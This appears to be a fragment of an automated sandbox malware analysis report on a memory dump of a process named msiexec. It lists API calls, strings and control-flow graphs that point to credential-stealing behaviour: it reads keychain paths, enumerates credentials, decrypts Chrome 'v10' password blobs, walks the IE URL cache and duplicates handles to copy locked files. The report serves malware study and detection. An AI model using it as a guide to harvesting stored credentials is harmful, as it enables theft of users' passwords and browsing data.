                                                    • memset.MSVCRT ref: 0044573D
                                                    • memset.MSVCRT ref: 00445755
                                                    • memset.MSVCRT ref: 004458CB
                                                    • memset.MSVCRT ref: 004458E3
                                                    • memset.MSVCRT ref: 0044596E
                                                    • memset.MSVCRT ref: 00445A10
                                                    • memset.MSVCRT ref: 00445A28
                                                    • memset.MSVCRT ref: 00445AC6
                                                      • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                      • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                      • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                      • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                      • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                    • memset.MSVCRT ref: 00445B52
                                                    • memset.MSVCRT ref: 00445B6A
                                                    • memset.MSVCRT ref: 00445C9B
                                                    • memset.MSVCRT ref: 00445CB3
                                                    • _wcsicmp.MSVCRT ref: 00445D56
                                                    • memset.MSVCRT ref: 00445B82
                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                      • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                      • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                      • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                      • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                    • memset.MSVCRT ref: 00445986
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                    • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                    • API String ID: 2263259095-3798722523
                                                    • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                    • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                    • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                                    • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                      • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                      • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                      • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                    • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                                    • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                                    • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: Library$AddressEnumErrorFreeHandleLoadMessageModeModuleProcResourceTypes
                                                    • String ID: $/deleteregkey$/savelangfile
                                                    • API String ID: 2744995895-28296030
                                                    • Opcode ID: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                    • Instruction ID: bb1d383b9f388563dc7403a66819e695bb2bbb53a4e653fbe84b6d7681309d95
                                                    • Opcode Fuzzy Hash: 72338f9f39f0fed86814d702f01b1d2779e3084bd08ead6f54537fd18a2fe269
                                                    • Instruction Fuzzy Hash: FC51BEB1608346ABD710AFA6DD88A9F77ECFF81304F40092EF644D2161D778E8558B2A

                                                    Control-flow Graph

                                                    APIs
                                                    • memset.MSVCRT ref: 0040B71C
                                                      • Part of subcall function 00409C70: wcscpy.MSVCRT ref: 00409C75
                                                      • Part of subcall function 00409C70: wcsrchr.MSVCRT ref: 00409C7D
                                                    • wcsrchr.MSVCRT ref: 0040B738
                                                    • memset.MSVCRT ref: 0040B756
                                                    • memset.MSVCRT ref: 0040B7F5
                                                    • CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                    • CloseHandle.KERNELBASE(00000000,?,?), ref: 0040B838
                                                    • memset.MSVCRT ref: 0040B851
                                                    • memset.MSVCRT ref: 0040B8CA
                                                    • memcmp.MSVCRT(?,v10,00000003), ref: 0040B9BF
                                                      • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                      • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                    • memset.MSVCRT ref: 0040BB53
                                                    • memcpy.MSVCRT(?,00000000,?,00000000,00000000,?), ref: 0040BB66
                                                    • LocalFree.KERNEL32(00000000,?,?,?,00000000,00000000,?), ref: 0040BB8D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$Freewcsrchr$AddressCloseCreateFileHandleLibraryLocalProcmemcmpmemcpywcscpy
                                                    • String ID: chp$v10
                                                    • API String ID: 4290143792-2783969131
                                                    • Opcode ID: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                    • Instruction ID: 8b5aa87907ec6e815121f1c024adfc7170cbdef62e19f7af032d1a0a82a34a86
                                                    • Opcode Fuzzy Hash: 839bcc7a1f039774e5e305ad4abdf0afa3b9ecc36c1b8e950fbf6c4f6c4bf1cf
                                                    • Instruction Fuzzy Hash: 32D17372900218AFEB11EB95DC41EEE77B8EF44304F1044BAF509B7191DB789F858B99

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 505 40e2ab-40e2ce call 40695d call 406b90 509 40e2d3-40e2d5 505->509 510 40e4a0-40e4af call 4069a3 509->510 511 40e2db-40e300 509->511 512 40e304-40e316 call 406e8f 511->512 517 40e476-40e483 call 406b53 512->517 518 40e31c-40e39b call 40dd50 * 7 memset call 40aa29 512->518 524 40e302 517->524 525 40e489-40e495 call 40aa04 517->525 542 40e3c9-40e3ce 518->542 543 40e39d-40e3ae call 40742e 518->543 524->512 525->510 530 40e497-40e49f free 525->530 530->510 545 40e3d0-40e3d6 542->545 546 40e3d9-40e3de 542->546 552 40e3b0 543->552 553 40e3b3-40e3c1 wcschr 543->553 545->546 548 40e3e0-40e3f1 memcpy 546->548 549 40e3f4-40e3f9 546->549 548->549 550 40e3fb-40e40c memcpy 549->550 551 40e40f-40e414 549->551 550->551 554 40e416-40e427 memcpy 551->554 555 40e42a-40e42f 551->555 552->553 553->542 556 40e3c3-40e3c6 553->556 554->555 557 40e431-40e442 memcpy 555->557 558 40e445-40e44a 555->558 556->542 557->558 559 40e44c-40e45b 558->559 560 40e45e-40e463 558->560 559->560 560->517 561 40e465-40e469 560->561 561->517 562 40e46b-40e473 561->562 562->517
                                                    APIs
                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                    • free.MSVCRT ref: 0040E49A
                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                    • memset.MSVCRT ref: 0040E380
                                                      • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                      • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                    • wcschr.MSVCRT ref: 0040E3B8
                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75572EE0), ref: 0040E3EC
                                                    • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,75572EE0), ref: 0040E407
                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75572EE0), ref: 0040E422
                                                    • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,75572EE0), ref: 0040E43D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                    • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                    • API String ID: 3849927982-2252543386
                                                    • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                    • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                    • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                    • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 563 4091b8-40921b memset call 40a6e6 call 444432 568 409520-409526 563->568 569 409221-40923b call 40b273 call 438552 563->569 573 409240-409248 569->573 574 409383-4093ab call 40b273 call 438552 573->574 575 40924e-409258 call 4251c4 573->575 587 4093b1 574->587 588 4094ff-40950b call 443d90 574->588 580 40937b-40937e call 424f26 575->580 581 40925e-409291 call 4253cf * 2 call 4253af * 2 575->581 580->574 581->580 611 409297-409299 581->611 589 4093d3-4093dd call 4251c4 587->589 588->568 597 40950d-409511 588->597 598 4093b3-4093cc call 4253cf * 2 589->598 599 4093df 589->599 597->568 601 409513-40951d call 408f2f 597->601 598->589 615 4093ce-4093d1 598->615 603 4094f7-4094fa call 424f26 599->603 601->568 603->588 611->580 613 40929f-4092a3 611->613 613->580 614 4092a9-4092ba 613->614 616 4092bc 614->616 617 4092be-4092e3 memcpy memcmp 614->617 615->589 618 4093e4-4093fb call 4253af * 2 615->618 616->617 619 409333-409345 memcmp 617->619 620 4092e5-4092ec 617->620 618->603 628 409401-409403 618->628 619->580 623 409347-40935f memcpy 619->623 620->580 622 4092f2-409331 memcpy * 2 620->622 625 409363-409378 memcpy 622->625 623->625 625->580 628->603 629 409409-40941b memcmp 628->629 629->603 630 409421-409433 memcmp 629->630 631 4094a4-4094b6 memcmp 630->631 632 409435-40943c 630->632 631->603 634 4094b8-4094ed memcpy * 2 631->634 632->603 633 409442-4094a2 memcpy * 3 632->633 635 4094f4 633->635 634->635 635->603
                                                    APIs
                                                    • memset.MSVCRT ref: 004091E2
                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                    • memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                    • memcpy.MSVCRT(?,00000023,?), ref: 0040930C
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409325
                                                    • memcmp.MSVCRT(00000000,0045A4E8,00000006), ref: 0040933B
                                                    • memcpy.MSVCRT(?,00000015,?), ref: 00409357
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 00409370
                                                    • memcmp.MSVCRT(00000000,004599B8,00000010), ref: 00409411
                                                    • memcmp.MSVCRT(00000000,0045A500,00000006), ref: 00409429
                                                    • memcpy.MSVCRT(?,00000023,?), ref: 00409462
                                                    • memcpy.MSVCRT(?,?,00000010), ref: 0040947E
                                                    • memcpy.MSVCRT(?,?,00000020), ref: 0040949A
                                                    • memcmp.MSVCRT(00000000,0045A4F8,00000006), ref: 004094AC
                                                    • memcpy.MSVCRT(?,00000015,?), ref: 004094D0
                                                    • memcpy.MSVCRT(?,?,00000020), ref: 004094E8
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memcpy$memcmp$ByteCharMultiWidememset
                                                    • String ID:
                                                    • API String ID: 3715365532-3916222277
                                                    • Opcode ID: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                    • Instruction ID: d5c0d9b4f94ac501fd0f2fb5594fd033b2d13f4c98b4255323c8c53c7695c3f7
                                                    • Opcode Fuzzy Hash: a80c2ed2cd7725c5ba05b8bc3cd527f2b50e73a4ba521d2eda8c640b4e065994
                                                    • Instruction Fuzzy Hash: DDA1BA71900605ABDB21EF65D885BAFB7BCAF44304F01043FF945E6282EB78EA458B59

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                      • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                      • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                      • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                      • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                      • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                    • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                    • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                    • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                      • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                      • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                      • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                      • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                    • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                    • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                    • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                    • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                    • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                    • CloseHandle.KERNEL32(?), ref: 0040E148
                                                    • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                    • String ID: bhv
                                                    • API String ID: 4234240956-2689659898
                                                    • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                    • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                    • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                    • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 692 413f4f-413f52 693 413fa5 692->693 694 413f54-413f5a call 40a804 692->694 696 413f5f-413fa4 GetProcAddress * 5 694->696 696->693
                                                    APIs
                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                    • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                    • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                    • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                    • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                    • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                    • API String ID: 2941347001-70141382
                                                    • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                    • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                    • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                    • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 697 4466f4-44670e call 446904 GetModuleHandleA 700 446710-44671b 697->700 701 44672f-446732 697->701 700->701 702 44671d-446726 700->702 703 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 701->703 705 446747-44674b 702->705 706 446728-44672d 702->706 710 4467ac-4467b7 __setusermatherr 703->710 711 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 703->711 705->701 709 44674d-44674f 705->709 706->701 708 446734-44673b 706->708 708->701 712 44673d-446745 708->712 713 446755-446758 709->713 710->711 716 446810-446819 711->716 717 44681e-446825 711->717 712->713 713->703 718 4468d8-4468dd call 44693d 716->718 719 446827-446832 717->719 720 44686c-446870 717->720 723 446834-446838 719->723 724 44683a-44683e 719->724 721 446845-44684b 720->721 722 446872-446877 720->722 728 446853-446864 GetStartupInfoW 721->728 729 44684d-446851 721->729 722->720 723->719 723->724 724->721 726 446840-446842 724->726 726->721 730 446866-44686a 728->730 731 446879-44687b 728->731 729->726 729->728 732 44687c-446894 GetModuleHandleA call 41276d 730->732 731->732 735 446896-446897 exit 732->735 736 44689d-4468d6 _cexit 732->736 735->736 736->718
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                    • String ID:
                                                    • API String ID: 2827331108-0
                                                    • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                    • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                    • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                    • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                    Control-flow Graph

                                                    APIs
                                                    • memset.MSVCRT ref: 0040C298
                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                      • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                    • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                    • wcschr.MSVCRT ref: 0040C324
                                                    • wcschr.MSVCRT ref: 0040C344
                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                    • GetLastError.KERNEL32 ref: 0040C373
                                                    • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                    • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                    • String ID: visited:
                                                    • API String ID: 1157525455-1702587658
                                                    • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                    • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                    • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                    • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 763 40e175-40e1a1 call 40695d call 406b90 768 40e1a7-40e1e5 memset 763->768 769 40e299-40e2a8 call 4069a3 763->769 771 40e1e8-40e1fa call 406e8f 768->771 775 40e270-40e27d call 406b53 771->775 776 40e1fc-40e219 call 40dd50 * 2 771->776 775->771 782 40e283-40e286 775->782 776->775 787 40e21b-40e21d 776->787 783 40e291-40e294 call 40aa04 782->783 784 40e288-40e290 free 782->784 783->769 784->783 787->775 788 40e21f-40e235 call 40742e 787->788 788->775 791 40e237-40e242 call 40aae3 788->791 791->775 794 40e244-40e26b _snwprintf call 40a8d0 791->794 794->775
                                                    APIs
                                                      • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                    • memset.MSVCRT ref: 0040E1BD
                                                      • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                    • free.MSVCRT ref: 0040E28B
                                                      • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                      • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                      • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                    • _snwprintf.MSVCRT ref: 0040E257
                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                      • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                    • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                    • API String ID: 2804212203-2982631422
                                                    • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                    • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                    • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                    • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                      • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                    • memset.MSVCRT ref: 0040BC75
                                                    • memset.MSVCRT ref: 0040BC8C
                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                    • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                    • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                    • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000012.00000002.1970778989.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                    Similarity
                                                    • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                    • String ID:
                                                    • API String ID: 115830560-3916222277
                                                    • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                    • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                    • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                    • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                    Control-flow Graph

                                                    APIs
                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                      • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                      • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                      • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                      • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                      • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                      • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
